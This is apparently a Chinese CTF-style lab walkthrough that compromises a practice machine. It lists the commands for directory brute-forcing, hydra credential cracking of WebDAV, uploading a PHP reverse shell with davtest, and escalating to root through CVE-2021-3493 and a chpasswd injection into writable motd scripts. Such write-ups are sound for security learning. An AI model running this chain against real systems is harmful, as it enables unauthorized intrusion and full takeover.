1.常规端口及服务发现
2.查看页面没有发现有效信息,进行路径爆破
发现webdav这一文件传输技术,但是401需要验证账号密码
对隐藏文件进行爆破
dirsearch -u http://10.1.8.133 -f -e html,php,txt -w /usr/share/wordilsts/dirb/common.txt
发现多出来一个tips.txt文件,查看提示访问creds.txt但是是一种误解
3.生成定制字典进行爆破
cewl http://10.1.8.133 -w dict.txt
cat dict.txt | wc -l 发现有82个
使用hydra进行爆破 hydra -L dict.txt -P dict.txt 10.1.8.133 http-get /webdav -v 后面的意思是使用http
-get的方法对该路径爆破 -v是显示详细信息 成功破解出账号密码
4.开始进行文件上传
davtest -url http://10.1.8.133/webdav -auth yamdoot:Swarg
发现没有做过滤均可以上传,但是执行环境只有php可以执行
上传反弹shell的php文件 /usr/share/webshells/php/php-reverse-shell.php
davtest -url http://10.1.8.133/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php
-uploadloc rev.php
开启侦听端口后访问文件,成功反弹sehll外围打点完成
5.开始进行提权
找到python 3环境 进行shell升级
查看到/etc/passwd下存在narak账号,yamdoot的账号
用拿到的密码su到其他账号均失败
find / -type f -user root -perm -ug=x,o=w -exec ls -l ‘{}’ ;2>/dev/null
查找到一系列这些文件,查看到hell.sh下存在brainfuck语言语句
解码后得到输出的结果为chitragupt
依次尝试每个账号,发现inferno账号可以使用该密码登录成功
6.再次进行提权
uname -a发现版本为4.15.0-20,lsb-release -a 发现为18.0.4
使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号
7.但是思考到那时候并没有这个cve,尝试进行另外一个思路提权
继续查找文件find / -type f -user root -perm -ug=x,o=w -exec ls -l ‘{}’ ;2>/dev/null
发现motd(message of the day),是一个访问运行脚本的目录
尝试对找到的进程进行注入echo ‘root:123’ | chpasswd
发现注入成功拿下root权限,打靶完成
622
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
